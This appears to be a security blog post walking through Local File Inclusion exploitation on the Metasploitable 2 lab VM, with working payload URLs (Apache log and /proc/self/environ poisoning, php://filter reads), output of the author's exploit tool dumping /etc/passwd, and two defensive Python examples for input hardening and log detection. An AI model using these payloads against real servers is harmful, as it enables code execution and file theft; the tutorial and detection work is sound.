LFI Exploitation : Basics, code execution and information leak


Hello,

Today, I played a bit with Metasploitable 2.

It is really easy to root, so that's not the interest of this blog post.

Anyhow, I played around a bit and ended up coding a basic LFI exploit tool.

So yet another post on LFI exploitation ...

[h=2]So what is LFI?[/h]

LFI stands for Local File Inclusion.

It is a vulnerability that allows an attacker to make the application include local files.

Many people think it's not really dangerous because only LOCAL files get included.

Unfortunately (depending on which side of the barrier you are on ...), that is false: you can execute code through an LFI.

[h=2]So, how do you exploit it?[/h]

By including local files.

Yes, local files :).

These are the well-known techniques for LFI:

- Apache logs
- /proc/self/environ
- php://input
- NULL byte injection
- path truncation
- directory traversal
- PHP filters
- image inclusion with PHP code

[h=3]Apache logs[/h]

These were world-readable on old distributions.

Now they are only readable by the appropriate users.

You'd basically inject PHP code through GET requests:

[code]http://victim/<?php system ('id'); ?>[/code]

This would leave PHP code in the logs.

Then executing the PHP code is as simple as:

[code]http://victim/?page=/var/log/apache2/access_log[/code]

This gives code execution if the permissions on the logs are not set properly (some old systems remain).

[h=3]/proc/self/environ[/h]

This file is interesting because it exposes the web server process's environment, which includes things like your User-Agent header.

So, if you change your User-Agent to

[code]<?php system ('id'); ?>[/code]

and use this:

[code]http://victim/?page=/proc/self/environ[/code]

Yes, code execution!

[h=3]php://input[/h]

Ok, this one executes PHP code included in the POST data.

[h=3]NULL byte injection and path truncation[/h]

This one is pretty neat.

Say you have the following code:

[code]<?php include ($_GET['page'] . '.php'); ?>[/code]

Well, you can get rid of the '.php' extension using that trick.

Just append lots of . or /. (or a NULL byte, see below): the path gets normalized and truncated, and voila, no more extension.

NULL byte poisoning doesn't work for PHP >= 5.3.4, as it has been fixed.

Reverse path truncation is mostly the same, except the ../ goes before the file name.
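A hardened counterpart to the include above, as an added example that is not part of the original post: a Python model of the page-resolution step (the PHP include itself is not modelled) that rejects the NULL-byte, traversal, stream-wrapper and path-truncation inputs described in this and the previous sections. The function and fixture names (resolve_page, demo, the show-log page) are assumptions of this example.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def resolve_page(base_dir: str, page: str, allowlist: Optional[set] = None) -> Optional[str]:
    """Return the absolute path of <page>.php under base_dir, or None if the input is rejected.

    With an allowlist, only a bare page name on the list is accepted; that single check defeats
    traversal, stream wrappers, NULL bytes and path truncation at once and is the fix to prefer.
    Without one, the remaining checks are applied as defence in depth.
    """
    page = unquote(page)  # PHP hands the script the decoded value, so %00 arrives as a real NUL
    if allowlist is not None:
        return os.path.join(base_dir, page + ".php") if page in allowlist else None
    if "\x00" in page:    # NULL byte poisoning (truncated the path before PHP 5.3.4)
        return None
    if "://" in page:     # php://filter, php://input and other stream wrappers
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    # realpath() collapses the '../' and '/.' runs used by traversal and path truncation,
    # so the containment check is made on the path the include would actually open.
    if os.path.commonpath([base, target]) != base:
        return None
    return target if os.path.isfile(target) else None


def demo() -> dict:
    """Constructed fixture: a pages directory holding only show-log.php, probed with the
    inputs from the sections above. Returns each input's resolution (None = rejected)."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "show-log.php"), "w") as fh:
        fh.write("<?php echo 'log viewer'; ?>\n")
    inputs = {
        "legit": "show-log",
        "traversal": "../../../etc/passwd",
        "null_byte": "../../../proc/self/environ%00",
        "wrapper": "php://filter/read=convert.base64-encode/resource=index",
        "truncation": "../../../etc/passwd" + "/." * 40,
    }
    return {name: resolve_page(base, value) for name, value in inputs.items()}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:11s} -> {'REJECTED' if result is None else result}")
```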

[h=3]PHP filters[/h]

This technique is mainly used to leak file contents (.php and others).

It doesn't work if there is a prefix, as here:

[code]<?php include ($prefix . $_GET['page'] . '.php'); ?>[/code]

You exploit it using this request for instance:

[code]http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php[/code]

As you guessed, the PHP filter is:

[code]php://filter/read=convert.base64-encode/resource=[/code]

[h=3]Image with PHP code[/h]

This one is about appending PHP code to an image.

Including the image through the LFI lets you inject PHP code: the PHP interpreter interprets anything as code as long as it's inside <?php ?> tags.

If you have an LFI that isn't exploitable via /proc/self/environ or Apache logs, and there is no extension concatenation, this can still allow you to exploit it if you are able to upload images.

Let's say you have PHPBB and PhpLdapAdmin 1.1.0.5.

Well, you can upload an image using PHPBB, then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution.
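Detection logic for the request patterns walked through above (Apache log poisoning, /proc/self/environ, php://filter and php://input, NULL bytes, path truncation and directory traversal), as an added example that is not part of the original post: it checks Apache combined-format access-log lines against URL-decoded indicators. The indicator names, the sample lines and the client addresses are constructed.

```python
import re
from urllib.parse import unquote

# Indicators for the techniques described above, matched against the URL-decoded
# request line and User-Agent (decoded twice to also catch double-encoded payloads).
INDICATORS = {
    "traversal":       re.compile(r"(\.\./){2,}"),
    "proc_environ":    re.compile(r"/proc/self/environ"),
    "apache_log":      re.compile(r"/var/log/(apache2|httpd)/"),
    "php_wrapper":     re.compile(r"php://(filter|input)", re.I),
    "null_byte":       re.compile(r"\x00"),
    "path_truncation": re.compile(r"(/\.){10,}|/{10,}"),
    "php_tag":         re.compile(r"<\?php|<\?=", re.I),  # log / environ poisoning attempt
}

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')


def classify(line: str) -> list:
    """Return the sorted indicator names that fire on one access-log line ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    haystack = unquote(unquote(m["req"])) + "\n" + unquote(unquote(m["ua"]))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))


def scan(lines) -> list:
    """Return (client ip, indicators) for every line that triggers at least one indicator."""
    hits = []
    for line in lines:
        found = classify(line)
        if found:
            hits.append((LOG_RE.match(line)["ip"], found))
    return hits


# Constructed sample log: one benign request followed by the attack patterns described above.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Dec/2013:10:00:01 +0100] "GET /mutillidae/index.php?page=show-log.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Dec/2013:10:00:07 +0100] "GET /mutillidae/index.php?page=../../../proc/self/environ HTTP/1.1" 200 812 "-" "<?php system(\'id\'); ?>"',
    '10.0.0.9 - - [18/Dec/2013:10:00:12 +0100] "GET /mutillidae/index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 9330 "-" "curl/7.22.0"',
    '10.0.0.9 - - [18/Dec/2013:10:00:20 +0100] "GET /mutillidae/index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1710 "-" "curl/7.22.0"',
    '10.0.0.9 - - [18/Dec/2013:10:00:31 +0100] "GET /%3C%3Fphp%20system%28%27id%27%29%3B%20%3F%3E HTTP/1.1" 404 492 "-" "curl/7.22.0"',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ", ".join(found))
```

The last sample line is a poisoning attempt that returned 404: the PHP tag still lands in the access log, which is why the request line is scanned regardless of status code.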

[h=2]Exploit[/h]

I wrote a basic LFI exploiter that uses the PHP filter or /proc/self/environ tricks.

You can get it at LFI exploit tool.

The code isn't clean and it needs tons of improvement before it is really a usable tool. I plan on improving it on an as-needed basis. The cookie functionality is not implemented yet; it is just a placeholder for now.

You can test it on Mutillidae on Metasploitable 2. I haven't tested it anywhere else yet.

Example of use (this is on Metasploitable 2):

$ ./exploit-lfi.py -h
usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION
[--replace REPLACE] [--cookie COOKIE]

Exploit LFI

optional arguments:
-h, --help show this help message and exit
--url URL, -u URL URL to attack
--action ACTION, -a ACTION
exec or read (default)
--option OPTION, -o OPTION
Action argument
--replace REPLACE, -r REPLACE
string to replace
--cookie COOKIE, -c COOKIE
Cookie
$ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd'
[+] Checking vulnerability
Test url : http://192.168.56.107/mutillidae/index.php?page=whatever&
Is vulnerable with param page!
[+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD&
[+] Searching for root path
root : ../../../
[+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD&
[+] Testing : {'path': '/proc/self/environ', 'type': 'header'}
http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ&
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false

[h=2]Conclusion[/h]

As you can see in this introduction, code execution is quite possible with an LFI.

These aren't only information leak vulnerabilities.

That's all for today.

Cheers,

m_101

Updates

- 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work.

[h=2]References[/h]

- Basics on file inclusion: File Inclusion - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
- PhpLdapAdmin LFI: phpldapadmin Local File Inclusion
- Path truncation, part 1: ush.it - a beautiful place
- Path truncation, part 2: ush.it - a beautiful place

Source: Binary world for binary people :): LFI Exploitation : Basics, code execution and information leak
